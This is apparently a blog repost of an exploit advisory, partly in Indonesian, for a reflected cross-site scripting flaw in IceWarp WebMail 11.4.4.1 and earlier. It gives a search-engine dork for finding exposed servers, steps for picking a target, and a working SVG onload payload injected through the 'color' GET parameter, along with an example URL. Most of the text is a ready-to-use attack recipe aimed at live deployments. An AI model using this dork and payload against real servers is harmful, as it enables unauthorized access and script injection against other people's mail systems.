IceWarp WebMail 11.4.4.1 Cross Site Scripting
[+] Date: 2020/01/27
[+] Author: Lutfu Mert Ceylan
[+] Vendor Homepage: www.icewarp.com
[+] Tested on: Windows 10
[+] Versions: 11.4.4.1 and before
[+] Vulnerable Parameter: "color" (Get Method)
[+] Vulnerable File: /webmail/
[+} Dork : inurl:/webmail/ intext:Powered by IceWarp Server
1. Dorking seperti biasa
2. Pilih salah satu target dan masukan /webmail/ hingga terlihat seperti sign in ataupun login
3. Lalu masukan kode js nya ?color="><svg/onload=alert(260303)>
contoh https://target.com/webmail/?color="><svg/onload=alert(260303)>
note : hanya bisa masukan integer/angka jika dimasukan huruf gabakal bisa
4. Tuh kalo angka baru bisa, coba aja sendiri masukin huruf
Posting Komentar